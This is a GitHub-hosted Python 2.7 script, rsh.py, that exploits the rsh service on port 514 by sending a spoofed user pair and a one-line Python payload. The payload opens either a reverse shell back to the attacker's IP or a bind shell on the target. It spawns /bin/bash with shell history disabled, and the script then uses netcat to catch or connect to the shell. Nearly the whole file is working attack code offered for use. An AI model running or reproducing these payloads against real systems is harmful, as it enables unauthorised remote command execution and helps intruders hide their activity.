-
Notifications
You must be signed in to change notification settings - Fork 5
/
rsh.py
executable file
·70 lines (60 loc) · 2.57 KB
/
rsh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python2.7
#Rsh Shell
import sys
import socket
import random
import time
import subprocess
import signal
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def getNetworkIp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('www.google.com', 0))
return s.getsockname()[0]
def RunBindShell():
BINDSHELL = 'python -c "import os,pty,socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind((\'0.0.0.0\', %s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'%(bindport)
s.bind(('0.0.0.0', myport))
s.connect((host,514))
SEND="%s\0%s\0%s\0" % (fromuser, username, BINDSHELL)
s.send("\0")
s.send(SEND)
time.sleep(0.5)
test = s.recv(1024)
s.close()
print 'Using Netcat To Connect To %s On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'% (host,bindport)
subprocess.call(['nc' , str(host), bindport])
def RunReverseShell():
uselocalip = raw_input('Get Ip Automatically? y/n:')
if uselocalip.lower() =="y":
localip = getNetworkIp()
else:
localip = raw_input('Type Your Ip For Reverse Connection:')
print "Ip Changed To %s"%(localip)
REVERSESHELL = 'python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'%s\',%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'%(localip, bindport)
s.bind(('0.0.0.0', myport))
s.connect((host,514))
SEND="%s\0%s\0%s\0" % (fromuser, username, REVERSESHELL)
s.send("\0")
s.send(SEND)
print 'Using Netcat To Listen To On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'% bindport
subprocess.call(['nc' ,'-lp', bindport])
time.sleep(0.5)
test = s.recv(1024)
s.close()
if len(sys.argv) < 4:
print "Example ./rsh.py 10.10.10.10(ip) foobar(fromuser) foobar(username)"
sys.exit()
else:
host = sys.argv[1]
fromuser = sys.argv[2]
username = sys.argv[3]
myport = random.randrange(600, 900)
bindport = str(random.randrange(5000,6000))
payloadtype = raw_input('------------------------\n1.)Reverse Shell \n2.)Bind Shell\n------------------------\nChoose Your Option:')
if payloadtype ==("2"):
RunBindShell()
elif payloadtype ==("1"):
RunReverseShell()
else:
print "Invalid Option"
sys.exit()